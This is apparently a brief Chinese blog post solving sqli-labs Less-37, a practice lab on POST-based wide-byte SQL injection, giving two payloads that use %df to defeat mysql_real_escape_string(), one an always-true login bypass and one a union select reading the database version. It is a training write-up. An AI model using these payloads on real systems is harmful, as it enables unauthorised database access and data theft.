Less37【post方式宽字节注入】

Less37与less34注入方式一致,唯一不同点在less37利用mysql_real_escape_string()拦截注入
法1:Bp修改(默认浏览器会将所有能url编码的符号全部编码)
uname=123%df'or 1=1#&passwd=&submit=Submit
 
法2:特殊符号(优先对%df解码)
123�' union select @@version,2#
 
posted @ 2020-11-08 22:00  峰中追风  阅读(349)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路